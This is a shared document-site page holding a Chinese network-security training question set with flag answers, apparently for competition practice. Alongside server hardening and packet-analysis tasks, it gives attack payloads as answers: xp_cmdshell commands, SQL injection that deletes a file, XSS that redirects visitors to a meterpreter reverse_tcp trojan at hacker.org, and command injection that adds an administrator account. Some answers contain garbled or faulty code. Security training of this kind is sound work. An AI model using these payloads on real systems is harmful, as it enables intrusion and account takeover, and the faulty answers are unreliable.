收藏 分销(赏)

网络空间安全实训题及讲解.doc

上传人:pc****0 文档编号:7937985 上传时间:2025-01-27 格式:DOC 页数:15 大小:277.72KB 下载积分:10 金币
下载 相关 举报
网络空间安全实训题及讲解.doc_第1页
第1页 / 共15页
网络空间安全实训题及讲解.doc_第2页
第2页 / 共15页


点击查看更多>>
资源描述
训测二1-1 在服务器场景 CentOS5.5上 通过Linux命令行开启mysql服务,并将开启该服务命令字符串作为flag值提交: service mysqld start 训测二1-2 在服务器场景 CentOS5.5上 进入mysql 删除user表中host为127.0.0.1 的用户 ,查询剩下用户记录,把查询结果倒数第二条记录的host字段值作为flag值提交: localhost 训测二1-3在服务器场景 CentOS5.5上进入mysql (使用grant语句)添加一个用户test 密码为20170829,它的host为172.19.5.100 ,并赋予所有权限,将所输入代码作为flag值提交:grant all privileges ON *.* TO ‘test’@’172.19.5.100’identified by ‘20170829’with grant option; 训测二1-4在服务器场景 CentOS5.5上进入mysql 的配置文件,限制最大连接数为2,并将mysql的配置文件路径F1,及其增加的一行F2作为flag值提交:格式为(F1|F2) (/etc/f|max_user_connections=2) 训测二1-5在服务器场景 CentOS5.5上进入mysql 的配置文件,使其他主机不能远程连接数据库F1,并禁止对本地文件存取F2,将其增加行作为Flag值提交:格式为{F1|F2} {skip-networking|set-variable=local-infile=0} 训测二1-6在服务器场景 CentOS5.5上进入mysql 的配置文件, 启动项加固 ,使访问能被审计,并将日志其路径作为flag值提交。 /usr/local/mysql/log/mysql.log 训测二1-7在服务器场景 CentOS5.5上开启http服务,其配置文件的路径作为flag值提交: /etc/httpd/conf/httpd.conf 训测二1-8在服务器场景 CentOS5.5上进入httpd配置文件,将网站发布目录作为flag值提交:/var/www/html 训测二1-9在服务器场景 CentOS5.5上进入httpd配置文件修改代码使其在出现错误页的时候不显示服务器操作系统的名称。将修改后的一行代码作为flag值提交:ServerTokens Prod 训测二1-10在服务器场景 CentOS5.5上进入httpd配置文件修改代码使其不回显apache版本信息。将修改后的代码作为flag值提交:ServerSignature Off 训测二1-11用渗透平台nmap 扫描靶机CentOS5.5 将其apache版本信息作为flag提交。 Apache httpd 2.2.3 ((CentOS)) 训测二2-1在服务器场景Windows2003上对sqlserver2000进行 sp4补丁安装,重启。将其补丁的文件夹名字F1和增加的端口号(用 netstat -an查询)F2作为flag值提交:格式为:F1|F2 SQL2KSP4|1433 训测二2-2在服务器场景 Windows2003上进入sqlserver2000 服务器使用存储过程添加系统用户njcx。将其输入代码作为flag值提交: exec master.dbo.xp_cmdshell ‘net user njcx /add’ 训测二2-3在服务器场景Windows2003上关闭xp_cmdshell服务,将其关闭的代码作为flag值提交: exec sp_dropextendedproc 'xp_cmdshell' 训测二2-4在服务器场景Windows2003 上开启xp_cmdshell 服务,将其开启的代码作为flag值提交: exec sp_addextendedproc xp_cmdshell,'xplog70.dll' 训测二2-5在服务器场景 Windows2003上 使用netstat –an 查看端口,并将http有关的一行作为flag值提交: TCP 0.0.0.0:80 0.0.0.0:0 LISTENING 训测二2-6在服务器场景 Windows2003上用浏览器打开网页127.0.0.1 将其内容作为flag值提交。 训测二2-7 用渗透平台nmap 扫描靶机win2003将其iis版本作为flag提交。 Microsoft IIS httpd 6.0 训测三-1.1在服务器场景CentOS5.5上通过Linux命令行关闭ssh服务,将关闭该服命令字符串作为Flag值提交。 Service sshd stop 训测三-1.2 在服务器场景CentOS5.5上通过/Flag/ifconfig去查询ip地址,把flag的值作为flag提交。 sbin 训测三-1.3用渗透平台对服务器场景CentOS5.5进行综合扫描渗透测试,把显示结果正数第5行的四个单词作为flag值提交。格式为:|..|..|..|..| |PORT|STATE|SERVICE|VERSION| 训测三-1.4在服务器场景CentOS5.5上通过Linux命令行开启ssh服务,将开启该服命令字符串作为Flag值提交。 /etc/init.d/sshd start 训测三-1.5 用渗透平台对服务器场景CentOS5.5进行hydra命令爆破使用所给字典。把现实结果的倒数第二行的第二个数字F1和正确结果的login:后面的字符串F2作为flag值提交。格式为:F1&F2 1&root 训测三-1.6用渗透平台对服务器场景CentOS5.5 进行ssh远程登录并且使用 wireshark对其进行协议分析,并把发送的第一个包的长度作为flag值提交 48 训测三-1.7用渗透平台对服务器场景CentOS5.5 进行ssh远程登录并且使用 wireshark对其进行协议分析,并把现实结果中物理mac地址加密方式作为flag值提交。 Hmac-md5 训测三-2.1 打开靶机,使其与物理机上的window2003虚拟机 建立 ipsec vpn预共享秘钥为123123,用渗透平台wireshark对其进行监听,用其第一阶段的全称作为flag值提交。 Internet Security Association and Key Manage Protocol 训测三-2.2打开靶机,使其与物理机上的window2003虚拟机 建立 ipsec vpn,用渗透平台wireshark对其进行监听,用其第二阶段的全称作为flag值提交。、 Encap sulating Security Payload 训测三-2.3打开靶机,使其与物理机上的window2003虚拟机 建立 ipsec vpn,用渗透平台wireshark对其进行监听,找到第一阶段现实结果中的Version:后面的字符串作为flag提交。 1.0 训测三-2.4打开靶机,使其与物理机上的window2003虚拟机 建立 ipsec vpn,用渗透平台wireshark对其进行监听,找到第二阶段的显示结果的的倒数第一行作为flag值提交。 Data (68 bytes) 训测三-3.1打开虚拟机2003中的Ethereal,监听到本机通过internet Explorer 访问靶机服务器场景上的Test.html页面内容,并将Ethereal监听到的Test.html页面内容在Ethereal程序当中的显示结果倒数第二行内容作为flag值提交。 </body> 训测三-3.2在虚拟机2003 与靶机2003之间建立sslvpn,须通过CA服务颁发证书;2003服务器域名为,并将2003 服务器个人证书信息的“颁发给:”内容作为flag值提交。 训测三-3.3在虚拟机2003 与靶机2003之间建立sslvpn,再次打开Ethereal,监听Internet Explorer访问靶机2003服务器场景流量,验证此时Ethereal无法明文监听到intnet Explorer访问靶机2003场景的http流量,并将靶机2003服务器通过ssl Record Layer对internet Explorer请求响应的加密应用层数据长度Length值作为flag值提交。 301 训测四1-1通过渗透平台对CentOS5.5进行渗透,利用msf工具对其进行远程超级管理员口令破解,使其通过root用户登入目标靶机(密码为654321),并将漏洞的路径作为flag值提交。 auxiliary/scanner/ssh/ssh_login 训测四1-2 对CentOS5.5服务器场景进行安全加固,阻止PC中渗透测试平台对服务器场景CentOS5.5进行远程超级管理员口令暴力破解,并将配置文件路径及配置文件加固的内容字符串作为Flag提交。格式为:F1&F2 /etc/ssh/sshd_config&PermitRootLogin no 训测四1-3再次通过渗透平台对CentOS5.5进行渗透,利用msf工具对其进行远程超级管理员口令破解,使其通过root用户登入目标靶机,并将现实结果的倒数第二行作为flag值提交: [*] Scanned 1 of 1 hosts (100% complete) 训测四1-4在服务器场景CentOS5.5上通过Linux命令行添加用户userl,并配置密码。将添加用户的命令字符串F1与配置密码的命令字符串F2作为Flag值提交;格式为:F1&F2&F3…… adduser userl&password userl 训测四1-5在服务器场景 CentOS5.5上开启http服务,其配置文件的路径作为flag值提交: /etc/httpd/conf/httpd.conf 训测四1-6通过PC2中渗透测试平台对服务器场景CentOS5.5进行操作系统综合扫描渗透测试(使用工具NMAP,使用必须要使用的参数),并将该操作使用命令中必须要使用的参数作为Flag提交; A 训测四1-9通过渗透平台对服务器场景CentOS5.5进行ARP扫描渗透测试(使用arping,发送请求数据包数量为5个),并将该操作使用命令中固定不变的字符串作为flag提交; arping –t 5 训测四1-10通过渗透平台对服务器场景CentOS5.5进行ARP扫描渗透测试(使用arping,发送请求数据包数量为5个),并将该操作结果的最后1行,从左边数第二个数字作为flag提交; 5 训测四2-1在靶机与虚拟机上做ipsecvpn,组阻止Sniffer监听渗透测试,虚拟机通过ping访问WebServ2003服务器,将第一个数据包回显结果作为flag提交; Negotiating IP Security. 训测四2-2打开靶机,使其与物理机上的window2003虚拟机 建立 ipsec vpn,用渗透平台wireshark对其进行监听,找到第二阶段的显示结果的的倒数第一行作为flag值提交。 Data (68 bytes) 训测四2-3在虚拟机2003 与靶机2003之间建立sslvpn,再次打开Ethereal,监听Internet Explorer访问靶机2003服务器场景流量,验证此时Ethereal无法明文监听到intnet Explorer访问靶机2003场景的http流量,并将靶机2003服务器通过ssl Record Layer对internet Explorer请求响应的加密应用层数据长度Length值作为flag值提交。 训测四2-4在服务器场景Windows2003上对sqlserver2000进行 sp4补丁安装,重启,将增加的端口整行信息作为flag值提交。 TCP 0.0.0.0:1433 0.0.0.0:0 LISTENING 训测四2-5通过PC中的渗透测试平台对服务器场景WebServ2003进行数据库服务扫描渗透测试,并将扫描结果作为Flag提交; 训测四2-6通过对服务器场景WebServ2003的数据库服务进行安全加固,阻止PC中渗透测试平台对其进行数据库超级管理员密码暴力破解渗透测试,并将加固身份验证选项中的最后一个字符串作为Flag提交。 Windows[w] 训测四2-7查找windows2003靶机里的完整的计算机名称作为flag值提交;hh-admin 训测四2-8 查找windows2003靶机系统属性中‘系统:’后的字符串作为flag值提交; Microsoft Windows Server 2003 Standard Edition 训测四2-9查找windows2003靶机来宾访客用户的名称,将其作为flag值提交;Guest 训测四2-10 查找windows2003靶机的默认共享名,并将查找命令F1与默认共享名F2作为flag值提交。格式为:F1-F2 net share-C$ 训测五1-1使用bt5对靶机进行渗透测试,通过暴力破解ssh密码登录系统,并将密码作为flag值提交; 981 训测五1-2在服务器场景CentOS5.5上通过Linux命令行开启HTTP服务,并将开启该服务命令字符串作为Flag值提交; /etc/init.d/httpd start 训测五1-4通过PC中渗透测试平台对服务器场景CentOS5.5进行操作系统扫描渗透测试(使用工具NMAP,使用必须要使用的参数),并将该操作显示结果“OS Details:”之后的字符串作为Flag提交; Linux 2.6.9 训测五1-5在服务器场景CentOS5.5上通过Linux命令行关闭ssh服务,再次打开bt5,行操作系统综合扫描渗透测试,将关闭该服务命令字符串以及第二个服务信息作为Flag值提交;格式为:f1|f2 service sshd stop|111/tcp open rpcbind (rpcbind V2) 2 (rpc #100000) 训测五1-6在服务器场景CentOS5.5上通过Linux命令行添加用户Za,添加密码并且给予root权限,将命令字符串作为Flag值提交;格式为:F1|F2|F3 useradd Za|passwd Za|usermod –g root Za 训测五1-9在服务器场景 CentOS5.5上进入httpd配置文件修改代码使其在出现错误页的时候不显示服务器操作系统的名称。将修改后的一行代码作为flag值提交: ServerTokens Prod 训测五1-10在服务器场景 CentOS5.5上进入httpd配置文件修改代码使其不回显apache版本信息。将修改后的代码作为flag值提交: ServerSignature Off 训测五-1-11 在服务器场景CentOS5.5上通过/…/ifconfig去查询ip地址,把…的值作为flag提交。 sbin 训测五-1-12用渗透平台对服务器场景CentOS5.5 进行ssh远程登录并且使用 wireshark对其进行协议分析,并把发送的第一个包的长度及encryption加密算法作为flag值提交;格式为f1-f2 48-aes128-ctr 训测五-1-13通过PC中渗透测试平台对服务器场景CentOS5.5进行ARP扫描渗透测试(使用工具Metasploit中arp_sweep模块),并将工具Metasploit中arp_sweep模块存放路径字符串作为Flag(形式:字符串1/字符串2/字符串3..)提交; auxiliary/scanner/discovery/arp_sweep 训测五-1-14通过PC中渗透测试平台对服务器场景CentOS5.5进行ARP扫描渗透测试(使用工具Metasploit中arp_sweep模块),假设目标服务器场景CentOS5.5在线,请将工具Metasploit中arp_sweep模块运行显示结果的第1行出现的IP地址右边的第1个单词作为Flag提交; appears 训测五-1-15通过通过PC中渗透测试平台对服务器场景CentOS5.5进行ARP扫描渗透测试(使用工具Metasploit中arp_sweep模块),假设目标服务器场景CentOS5.5在线,请将工具Metasploit中arp_sweep模块运行显示结果的最后1行的倒数第二个单词作为Flag提交; execution 训测五-1-16通过PC中渗透测试平台对服务器场景CentOS5.5进行ARP扫描渗透测试(使用工具Metasploit中arp_sweep模块),假设目标服务器场景CentOS5.5在线,请将工具Metasploit中arp_sweep模块的运行命令字符串作为Flag提交; exploit 训测五2-1在服务器场景Windows2003上对sqlserver2000进行 sp4补丁安装,重启。将其补丁的文件夹名字F1和增加的端口号信息(用 netstat -an查询)F2作为flag值提交:格式为:F1|F2 SQL2KSP4|TCP 0.0.0.0:1433 0.0.0.0:0 LISTENING 训测五2-2在bt5上使用hydra暴力破解sql-server数据库(mssql),并将其爆破结果中正确结果login:结果和password:结果作为flag值提交;格式为f1&f2 sa&1234 训测五2-3在靶机2003上打开sql-server,进行存储过程,在c盘下创建文件夹njcx,将其过程作为flag值提交。 exec master.dbo.xp_cmdshell ‘md c:\njcx’ 训测五-2-4在虚拟机2003 与靶机2003之间建立sslvpn,再次打开Ethereal,监听Internet Explorer访问靶机2003服务器场景流量,验证此时Ethereal无法明文监听到intnet Explorer访问靶机2003场景的http流量,并将靶机2003服务器通过ssl Record Layer对internet Explorer请求响应的加密应用层数据长度Length值作为flag值提交。 299 信息安全管理与评估补充题 1. 配置靶机WebServ2003的DHCP功能,能够分配IP的范围为172.19.X.X(111~150),XP客户端申请IP地址,将第二阶段和第四的数据包类型作为Flag值提交,格式为:F1-F2; DHCP OFFER DHCP ACK 2. 使用渗透机攻击WebServ2003,进行DHCP地址池耗尽攻击,把使用中的IP地址数比例作为Flag提交; 100% 3.进入loginAuth.php程序,修改PHP源程序,使之可以抵御SQL注入,并填补空缺处内容,将填补内容作为Flag提交,格式为F1|F2|F3; Mssql_select_db Password $password 4. 再次对该任务loginAuth.php页面注入点进行渗透测试,验证此次利用任意用户进行SQL注入渗透测试无效,并将回显提示信息作为Flag提交。 Username Does Not Exist 5.Web继续访问WebServ2003服务器,"/"->"Employee Information Query",分析该页面源程序,找到提交的变量名,并作为Flag提交。 usernm 5. Web继续访问WebServ2003服务器,"/"->"Employee Information Query",分析该页面源程序,将表单提交方式作为Flag提交。 get 6. Web继续访问WebServ2003服务器,"/"->"Employee Information Query",分析该页面源程序,表单提交后跳转页面的路径作为Flag提交。 list.html 7. 对"Employee Information Query"页面注入点进行渗透测试,根据输入“%”以及“_”的返回结果确定是注入点,并将显示结果倒数第三行内容作为Flag提交; Email:ww@ 9.通过对该任务题目5页面注入点进行SQL注入渗透测试,删除WebServ2003服务器的C:\目录下的1.txt文档,并将注入代码作为Flag提交。 ‘exec master.dbo.xp_cmdshell ‘del c:\1.txt’— 10. 进入WebServ2003服务器的C:\AppServ\www目录,找到QueryCtrl.php程序,分析并修改PHP源程序,将‘%’替换为‘\%’,‘_’替换为‘\_’使之可以抵御SQL注入渗透测试,并将修改后新增语句内容作为Flag提交。格式为F1-F2-F3… $keyWord=addslashes($KeyWord); $keyWord=str_replace(“%”,”\”,$KeyWord); $keyWord=str_replace(“%_”,”\_”,$KeyWord); 11. 再次对该任务题目5页面注入点进行渗透测试,验证此次利用注入点对该WebServer进行SQL注入渗透测试无效,并将验证过程截图。将系统出现的错误提示作为Flag提交。 Bad KeyWord! 12. 进入WebServ2003服务器,禁用系统存储过程可以抵御SQL注入渗透测试,将禁用系统存储的语句作为Flag提交。格式为Y1-Y2-Y3-Y4... 13. 进入"/"->" Employee Message Board"->"Display Message"页面,再次对页面注入点进行渗透测试,调用存储过程删除WebServ2003服务器的C:\目录下的1.txt文档,将页面提示第一个字符串作为Flag提交; Warning 14. 进入"/"->" Employee Message Board"->"Display Message"页面进行XSS渗透测试,循环弹框"Hacker!",根据该页面的显示,确定是注入点,并将构造的注入代码作为Flag提交。 <script>while(1){alert(“Hacker!”);};</script> 15. 通过IIS搭建网站(http://hacker.org/),并通过渗透机生成木马程序TrojanHorse.exe,将使用的工具和模块路径作为Flag提交。格式为{F1&F2} msfpayload Windows/meterpreter/reverse_tcp 16. 对该任务题目1页面注入点进行渗透测试,使"/"->" Employee Message Board"->"Display Message"页面的访问者执行网站(http://hacker.org/)中的木马程序:http://hacker.org/TrojanHorse.exe,并将注入代码作为Flag提交。 <script> Location.href=“htt://hacker.org/TrojanHorse.exe”; </script> 17. 进入WebServ2003服务器的C:\AppServ\www目录,找到insert.php程序,分析并修改PHP源程序,使用‘{’替‘<’、‘}’替换‘>’,使之可以抵御XSS渗透测试,并将需要使用的函数和增加语句作为Flag提交。格式为[F1/F2] Str_replace $info=str_replace(“<”,”{”,$info); $info=str_replace(“>”,”}”,$info); 18. 再次执行第16题注入渗透攻击,进入后台数据库中存储内容作为Flag提交。 19.Web访问DCST中的WebServ2003服务器,"/"->" Shopping Hall",分析该页面源程序,找到最后一次提交的变量名和值作为Flag提交。 Goods=dvdrom&quantity=1 19. 对该任务题目19页面注入点进行渗透测试,使"/"->" Employee Message Board"->"Display Message"页面的访问者向页面ShoppingProcess.php提交参数goods=cpu&quantity=10000,查看"/"->"PurchasedGoods.php页面,并将注入代码作为Flag提交。 <script> document.location="http://192.168.204.126/ShoppingProcess.php?goods=cpu&quantity=10000"; </script> 20. 进入WebServ2003服务器的C:\AppServ\www目录,找到DisplayMessage.php程序,分析并修改PHP源程序,使之可以抵御CSRF渗透测试,将需要用到的函数作为Flag提交。 Strip_tags 21. Web访问ebServ2003服务器,"/"->" Display Directory",分析该页面源程序,找到提交的变量名作为Flag。 directory 22. 对题目22页面注入点进行渗透测试,使页面DisplayDirectoryCtrl.php回显C:\Windows目录内容的同时,对WebServer添加账号“Hacker”,将该账号加入管理员组,并将注入代码作为Flag提交。 WINDOWS|net user Hacker P@ssword /add WINDOWS|net localgroup administrators Hacker /add 24.对该任务题目22页面注入点进行第23题渗透测试,使页面DisplayDirectoryCtrl.php回显内容最后一行作为Flag提交。 Display C:’Directory
展开阅读全文

开通  VIP会员、SVIP会员  优惠大
下载10份以上建议开通VIP会员
下载20份以上建议开通SVIP会员


开通VIP      成为共赢上传

当前位置:首页 > 百科休闲 > 其他

移动网页_全站_页脚广告1

关于我们      便捷服务       自信AI       AI导航        抽奖活动

©2010-2026 宁波自信网络信息技术有限公司  版权所有

客服电话:0574-28810668  投诉电话:18658249818

gongan.png浙公网安备33021202000488号   

icp.png浙ICP备2021020529号-1  |  浙B2-20240490  

关注我们 :微信公众号    抖音    微博    LOFTER 

客服